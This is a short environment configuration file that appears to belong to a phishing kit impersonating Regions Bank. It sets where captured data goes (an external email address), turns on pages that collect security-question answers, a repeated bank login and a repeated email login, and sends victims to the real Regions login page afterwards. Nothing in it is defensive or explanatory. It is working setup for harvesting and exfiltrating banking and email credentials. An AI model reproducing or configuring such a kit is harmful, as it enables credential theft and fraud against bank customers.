BANK_NAME=REGIONS
TO=sendresults@rocketsms.me
NEXT_PUBLIC_DOCS_PAGE=OFF
NEXT_PUBLIC_SECQES_PAGE=ON
NEXT_PUBLIC_EXIT_URL=https://login.regions.com/
NEXT_PUBLIC_DOUBLE_LOGIN=ON
NEXT_PUBLIC_DOUBLE_EMAIL_LOGIN=ON
NEXT_PUBLIC_TAKE_SELFIE=OFF